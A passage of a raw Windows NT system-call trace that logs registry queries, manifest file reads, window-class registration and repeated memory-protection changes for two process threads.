(0x773d1000), 4096, 4, ) == 0x0 01551 896 NtFlushInstructionCache (-1, 2000490496, 1924, ... ) == 0x0 01552 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\comctl32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01553 896 NtAddAtom ( ("T\0h\0e\0m\0e\0P\0r\0o\0p\0S\0c\0r\0o\0l\0l\0B\0a\0r\0C\0t\0l\0", 42, 1237444, ... ) , 42, 1237444, ... ) == 0x0 01554 896 NtQueryDefaultUILanguage (1236128, ... 01555 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01556 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... -2147481368, ) == 0x0 01557 896 NtQueryInformationToken (-2147481368, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01558 896 NtClose (-2147481368, ... ) == 0x0 01559 896 NtOpenKey (0x2000000, {24, 0, 0x640, 0, 0, (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... -2147481368, ) }, ... -2147481368, ) == 0x0 01560 896 NtOpenKey (0x80000000, {24, -2147481368, 0x240, 0, 0, (0x80000000, {24, -2147481368, 0x240, 0, 0, "Software\Policies\Microsoft\Control Panel\Desktop"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01561 896 NtOpenKey (0x80000000, {24, -2147481368, 0x640, 0, 0, (0x80000000, {24, -2147481368, 0x640, 0, 0, "Control Panel\Desktop"}, ... -2147481452, ) }, ... -2147481452, ) == 0x0 01562 896 NtQueryValueKey (-2147481452, (-2147481452, "MultiUILanguageId", Partial, 256, ... ) , Partial, 256, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01563 896 NtClose (-2147481452, ... ) == 0x0 01564 896 NtClose (-2147481368, ... ) == 0x0 01554 896 NtQueryDefaultUILanguage ... ) == 0x0 01565 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WindowsShell.Manifest"}, 1234968, ... ) }, 1234968, ... ) == 0x0 01566 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WindowsShell.Manifest"}, 5, 96, ... 52, {status=0x0, info=1}, ) }, 5, 96, ... 52, {status=0x0, info=1}, ) == 0x0 01567 896 NtCreateSection (0xe, 0x0, 0x0, 16, 134217728, 52, ... 120, ) == 0x0 01568 896 NtClose (52, ... ) == 0x0 01569 896 NtMapViewOfSection (120, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0xd10000), 0x0, 4096, ) == 0x0 01570 896 NtClose (120, ... ) == 0x0 01571 896 NtUnmapViewOfSection (-1, 0xd10000, ... ) == 0x0 01572 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WindowsShell.Manifest"}, 1234564, ... ) }, 1234564, ... ) == 0x0 01573 896 NtCreateFile (0x80100080, {24, 0, 0x40, 0, 1235308, (0x80100080, {24, 0, 0x40, 0, 1235308, "\??\C:\WINDOWS\WindowsShell.Manifest"}, 0x0, 0, 5, 1, 96, 0, 0, ... 120, {status=0x0, info=1}, ) }, 0x0, 0, 5, 1, 96, 0, 0, ... 120, {status=0x0, info=1}, ) == 0x0 01574 896 NtCreateSection (0xf0005, 0x0, 0x0, 2, 134217728, 120, ... 52, ) == 0x0 01575 896 NtClose (120, ... ) == 0x0 01576 896 NtMapViewOfSection (52, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 2, ... (0xd10000), {0, 0}, 4096, ) == 0x0 01577 896 NtClose (52, ... ) == 0x0 01578 896 NtUnmapViewOfSection (-1, 0xd10000, ... ) == 0x0 01579 896 NtOpenFile (0x1200a9, {24, 0, 0x40, 0, 0, (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WindowsShell.Manifest"}, 1, 96, ... 52, {status=0x0, info=1}, ) }, 1, 96, ... 52, {status=0x0, info=1}, ) == 0x0 01580 896 NtCreateSection (0x4, 0x0, 0x0, 2, 134217728, 52, ... 120, ) == 0x0 01581 896 NtMapViewOfSection (120, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 2, ... (0xd10000), 0x0, 4096, ) == 0x0 01582 896 NtQueryInformationFile (52, 1234960, 24, Standard, ... {status=0x0, info=24}, ) == 0x0 01583 896 NtOpenFile (0x1200a9, {24, 0, 0x40, 0, 0, (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WindowsShell.Config"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01584 896 NtRequestWaitReplyPort (24, {128, 156, new_msg, 0, 2088850039, 1235260, 1179817, 1234984} (24, {128, 156, new_msg, 0, 2088850039, 1235260, 1179817, 1234984} "\210\6!\1\33\0\1\0`\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\3\0@\0D\0\250\6!\14\0\0\0x\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\355\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\26\0\30\0\354\6!\1\0\0\0\0\0\0\0\00\335\22\0\0\0\0\0" ... {128, 156, reply, 0, 1252, 896, 82272, 0} "\260d\27\0\33\0\1\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\3\0@\0D\0\250\6!\14\0\0\0x\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\355\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\26\0\30\0\354\6!\1\0\0\0\0\0\0\0\00\335\22\0\0\0\0\0" ) ... {128, 156, reply, 0, 1252, 896, 82272, 0} (24, {128, 156, new_msg, 0, 2088850039, 1235260, 1179817, 1234984} "\210\6!\1\33\0\1\0`\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\3\0@\0D\0\250\6!\14\0\0\0x\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\355\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\26\0\30\0\354\6!\1\0\0\0\0\0\0\0\00\335\22\0\0\0\0\0" ... {128, 156, reply, 0, 1252, 896, 82272, 0} "\260d\27\0\33\0\1\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\3\0@\0D\0\250\6!\14\0\0\0x\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\355\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\26\0\30\0\354\6!\1\0\0\0\0\0\0\0\00\335\22\0\0\0\0\0" ) ) == 0x0 01585 896 NtClose (52, ... ) == 0x0 01586 896 NtClose (120, ... ) == 0x0 01587 896 NtUnmapViewOfSection (-1, 0xd10000, ... ) == 0x0 01588 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 01589 896 NtUserRegisterWindowMessage ( ("ShellGetDragImage", ... ) , ... ) == 0xc03a 01590 896 NtUserSystemParametersInfo (104, 0, 2001084812, 0, ... ) == 0x1 01591 896 NtUserGetDC (0, ... ) == 0x1010052 01592 896 NtUserCallOneParam (16842834, 57, ... ) == 0x1 01593 896 NtUserSystemParametersInfo (38, 4, 2001086940, 0, ... ) == 0x1 01594 896 NtUserSystemParametersInfo (66, 12, 1236960, 0, ... ) == 0x1 01595 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01596 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 120, ) == 0x0 01597 896 NtQueryInformationToken (120, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01598 896 NtClose (120, ... ) == 0x0 01599 896 NtOpenKey (0x20019, {24, 0, 0x640, 0, 0, (0x20019, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... 120, ) }, ... 120, ) == 0x0 01600 896 NtOpenProcessToken (-1, 0x8, ... 52, ) == 0x0 01601 896 NtAccessCheck (1334208, 52, 0x1, 1236792, 1236844, 56, 1236824, ... ) == STATUS_NO_IMPERSONATION_TOKEN 01602 896 NtClose (52, ... ) == 0x0 01603 896 NtOpenKey (0x20019, {24, 120, 0x40, 0, 0, (0x20019, {24, 120, 0x40, 0, 0, "Control Panel\Desktop"}, ... 52, ) }, ... 52, ) == 0x0 01604 896 NtQueryValueKey (52, (52, "SmoothScroll", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01605 896 NtClose (52, ... ) == 0x0 01606 896 NtUserSystemParametersInfo (41, 500, 1236988, 0, ... ) == 0x1 01607 896 NtOpenProcessToken (-1, 0x8, ... 52, ) == 0x0 01608 896 NtAccessCheck (1334208, 52, 0x1, 1236792, 1236844, 56, 1236824, ... ) == STATUS_NO_IMPERSONATION_TOKEN 01609 896 NtClose (52, ... ) == 0x0 01610 896 NtOpenKey (0x20019, {24, 120, 0x40, 0, 0, (0x20019, {24, 120, 0x40, 0, 0, "software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"}, ... 52, ) }, ... 52, ) == 0x0 01611 896 NtQueryValueKey (52, (52, "EnableBalloonTips", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01612 896 NtClose (52, ... ) == 0x0 01613 896 NtUserSystemParametersInfo (27, 0, 2001085788, 0, ... ) == 0x1 01614 896 NtUserSystemParametersInfo (102, 0, 2001086828, 0, ... ) == 0x1 01615 896 NtClose (120, ... ) == 0x0 01616 896 NtUserSystemParametersInfo (4130, 0, 1237492, 0, ... ) == 0x1 01617 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\LanguagePack"}, ... 120, ) }, ... 120, ) == 0x0 01618 896 NtEnumerateValueKey (120, 0, Full, 220, ... ) == STATUS_NO_MORE_ENTRIES 01619 896 NtClose (120, ... ) == 0x0 01620 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01621 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c03b 01622 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c03d 01623 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01624 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c03f 01625 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01626 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c041 01627 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01628 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c043 01629 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c045 01630 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01631 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c047 01632 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01633 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c049 01634 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01635 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c04b 01636 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01637 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c04d 01638 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01639 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c04f 01640 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c051 01641 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01642 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c053 01643 896 NtUserFindExistingCursorIcon (1236736, 1236752, 1236800, ... ) == 0x10011 01644 896 NtUserRegisterClassExWOW (1236680, 1236748, 1236764, 1236780, 0, 384, 0, ... ) == 0x8177c055 01645 896 NtUserFindExistingCursorIcon (1236736, 1236752, 1236800, ... ) == 0x10011 01646 896 NtUserRegisterClassExWOW (1236680, 1236748, 1236764, 1236780, 0, 384, 0, ... ) == 0x8177c057 01647 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01648 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c059 01649 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10013 01650 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c05b 01651 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01652 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c05d 01653 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01654 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c05f 01655 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01656 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c017 01657 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01658 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c019 01659 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10013 01660 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c018 01661 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01662 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c01a 01663 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01664 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c01c 01665 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01666 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c01e 01667 896 NtUserFindExistingCursorIcon (1236732, 1236748, 1236796, ... ) == 0x10011 01668 896 NtUserRegisterClassExWOW (1236732, 1236800, 1236816, 1236832, 0, 384, 0, ... ) == 0x8177c01b 01669 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01670 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c068 01671 896 NtUserFindExistingCursorIcon (1236740, 1236756, 1236804, ... ) == 0x10011 01672 896 NtUserRegisterClassExWOW (1236684, 1236752, 1236768, 1236784, 0, 384, 0, ... ) == 0x8177c06a 01673 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01674 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 120, ) == 0x0 01675 896 NtQueryInformationToken (120, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01676 896 NtClose (120, ... ) == 0x0 01677 896 NtOpenKey (0x2000000, {24, 0, 0x640, 0, 0, (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... 120, ) }, ... 120, ) == 0x0 01678 896 NtSetInformationObject (120, Handle, {Inherit=0,ProtectFromClose=1,}, 1179904, ... ) == 0x0 01679 896 NtCreateKey (0x2001f, {24, 120, 0x40, 0, 0, (0x2001f, {24, 120, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, 0, 0x0, 0, ... 52, 2, ) }, 0, 0x0, 0, ... 52, 2, ) == 0x0 01680 896 NtSetEventBoostPriority (112, ... 01472 376 NtWaitForSingleObject ... ) == 0x0 01681 376 NtTestAlert (... ) == 0x0 01682 376 NtContinue (13630768, 1, ... 01683 376 NtRegisterThreadTerminatePort (24, ... ) == 0x0 01684 376 NtDeviceIoControlFile (88, 100, 0x0, 0x77e466a0, 0x228144, (88, 100, 0x0, 0x77e466a0, 0x228144, "\2\0\0\0\1\0\0\0\\370\342w\0\0\0\0`\0\0\0\0\0\0\0l\0\0\0\0\0\0\0T\0\0\0\0\0\0\0", 40, 4096, ... {status=0x103, info=0}, "", ) , 40, 4096, ... {status=0x103, info=0}, "", ) == 0x103 01680 896 NtSetEventBoostPriority ... ) == 0x0 01685 896 NtProtectVirtualMemory (-1, (0x77f61194), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01686 896 NtProtectVirtualMemory (-1, (0x77f61194), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01687 896 NtProtectVirtualMemory (-1, (0x77f61198), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01688 896 NtProtectVirtualMemory (-1, (0x77f61198), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01689 376 NtWaitForMultipleObjects (2, (92, 100, ), 1, 1, {1294967296, -1}, ... ) == 0x0 01690 376 NtDeviceIoControlFile (88, 104, 0x0, 0x77e46680, 0x228144, (88, 104, 0x0, 0x77e46680, 0x228144, "\2\0\0\0\1\0\0\0\\370\342w\0\0\0\0`\0\0\0\0\0\0\0l\0\0\0\0\0\0\0T\0\0\0\0\0\0\0", 40, 4096, ... {status=0x103, info=0}, "", ) , 40, 4096, ... {status=0x103, info=0}, "", ) == 0x103 01691 376 NtWaitForMultipleObjects (2, (92, 104, ), 1, 1, {1294967296, -1}, ... 01692 896 NtProtectVirtualMemory (-1, (0x77f611cc), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01693 896 NtProtectVirtualMemory (-1, (0x77f611cc), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01694 896 NtProtectVirtualMemory (-1, (0x77f611d4), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01695 896 NtProtectVirtualMemory (-1, (0x77f611d4), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01696 896 NtProtectVirtualMemory (-1, (0x77f611e0), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01697 896 NtProtectVirtualMemory (-1, (0x77f611e0), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01698 896 NtProtectVirtualMemory (-1, (0x77f611f0), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01699 896 NtProtectVirtualMemory (-1, (0x77f611f0), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01700 896 NtProtectVirtualMemory (-1, (0x77f611f4), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01701 896 NtProtectVirtualMemory (-1, (0x77f611f4), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01702 896 NtProtectVirtualMemory (-1, (0x77f611f8), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01703 896 NtProtectVirtualMemory (-1, (0x77f611f8), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01704 896 NtProtectVirtualMemory (-1, (0x77f61210), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01705 896 NtProtectVirtualMemory (-1, (0x77f61210), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01706 896 NtProtectVirtualMemory (-1, (0x77f61244), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01707 896 NtProtectVirtualMemory (-1, (0x77f61244), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01708 896 NtProtectVirtualMemory (-1, (0x77f61250), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01709 896 NtProtectVirtualMemory (-1, (0x77f61250), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01710 896 NtProtectVirtualMemory (-1, (0x77f61268), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01711 896 NtProtectVirtualMemory (-1, (0x77f61268), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01712 896 NtProtectVirtualMemory (-1, (0x77f61274), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01713 896 NtProtectVirtualMemory (-1, (0x77f61274), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01714 896 NtProtectVirtualMemory (-1, (0x77f6127c), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01715 896 NtProtectVirtualMemory (-1, (0x77f6127c), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01716 896 NtProtectVirtualMemory (-1, (0x77f61280), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01717 896 NtProtectVirtualMemory (-1, (0x77f61280), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01718 896 NtProtectVirtualMemory (-1, (0x77f61284), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01719 896 NtProtectVirtualMemory (-1, (0x77f61284), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01720 896 NtProtectVirtualMemory (-1, (0x77f612a8), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01721 896 NtProtectVirtualMemory (-1, (0x77f612a8), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01722 896 NtProtectVirtualMemory (-1, (0x77f612d0), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01723 896 NtProtectVirtualMemory (-1, (0x77f612d0), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01724 896 NtProtectVirtualMemory (-1, (0x77f612d4), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01725 896 NtProtectVirtualMemory (-1, (0x77f612d4), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01726 896 NtProtectVirtualMemory (-1, (0x77f61320), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01727 896 NtProtectVirtualMemory (-1, (0x77f61320), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01728 896 NtProtectVirtualMemory (-1, (0x77f6133c), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01729 896 NtProtectVirtualMemory (-1, (0x77f6133c), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01730 896 NtProtectVirtualMemory (-1, (0x77f61370), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01731 896 NtProtectVirtualMemory (-1, (0x77f61370), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01732 896 NtProtectVirtualMemory (-1, (0x77f61394), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01733 896 NtProtectVirtualMemory (-1, (0x77f61394), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01734 896 NtProtectVirtualMemory (-1, (0x77f61398), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01735 896 NtProtectVirtualMemory (-1, (0x77f61398), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01736 896 NtProtectVirtualMemory (-1, (0x77f613d8), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01737 896 NtProtectVirtualMemory (-1, (0x77f613d8), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01738 896 NtProtectVirtualMemory (-1, (0x77f61434), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01739 896 NtProtectVirtualMemory (-1, (0x77f61434), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01740 896 NtProtectVirtualMemory (-1, (0x77f61438), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01741 896 NtProtectVirtualMemory (-1, (0x77f61438), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01742 896 NtProtectVirtualMemory (-1, (0x77f61444), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01743 896 NtProtectVirtualMemory (-1, (0x77f61444), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01744 896 NtProtectVirtualMemory (-1, (0x77f61448), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01745 896 NtProtectVirtualMemory (-1, (0x77f61448), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01746 896 NtProtectVirtualMemory (-1, (0x77f6144c), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01747 896 NtProtectVirtualMemory (-1, (0x77f6144c), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01748 896 NtProtectVirtualMemory (-1, (0x77f61450), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01749 896 NtProtectVirtualMemory (-1, (0x77f61450), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01750 896 NtProtectVirtualMemory (-1, (0x77f61460), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01751 896 NtProtectVirtualMemory (-1, (0x77f61460), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01752 896 NtProtectVirtualMemory (-1, (0x77f614a8), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01753 896 NtProtectVirtualMemory (-1, (0x77f614a8), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01754 896 NtProtectVirtualMemory (-1, (0x77f61564), 4, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01755 896 NtProtectVirtualMemory (-1, (0x77f61564), 4, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01756 896 NtProtectVirtualMemory (-1, (0x42c11280), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01757 896 NtProtectVirtualMemory (-1, (0x42c11280), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01758 896 NtProtectVirtualMemory (-1, (0x42c11288), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01759 896 NtProtectVirtualMemory (-1, (0x42c11288), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01760 896 NtProtectVirtualMemory (-1, (0x42c1128c), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01761 896 NtProtectVirtualMemory (-1, (0x42c1128c), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01762 896 NtProtectVirtualMemory (-1, (0x42c112a8), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01763 896 NtProtectVirtualMemory (-1, (0x42c112a8), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01764 896 NtProtectVirtualMemory (-1, (0x42c112ac), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01765 896 NtProtectVirtualMemory (-1, (0x42c112ac), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01766 896 NtProtectVirtualMemory (-1, (0x42c11314), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01767 896 NtProtectVirtualMemory (-1, (0x42c11314), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01768 896 NtProtectVirtualMemory (-1, (0x42c1137c), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01769 896 NtProtectVirtualMemory (-1, (0x42c1137c), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01770 896 NtProtectVirtualMemory (-1, (0x42c11384), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01771 896 NtProtectVirtualMemory (-1, (0x42c11384), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01772 896 NtProtectVirtualMemory (-1, (0x42c11388), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01773 896 NtProtectVirtualMemory (-1, (0x42c11388), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01774 896 NtProtectVirtualMemory (-1, (0x42c1138c), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01775 896 NtProtectVirtualMemory (-1, (0x42c1138c), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01776 896 NtProtectVirtualMemory (-1, (0x42c11390), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01777 896 NtProtectVirtualMemory (-1, (0x42c11390), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01778 896 NtProtectVirtualMemory (-1, (0x42c11394), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01779 896 NtProtectVirtualMemory (-1, (0x42c11394), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01780 896 NtProtectVirtualMemory (-1, (0x42c113e0), 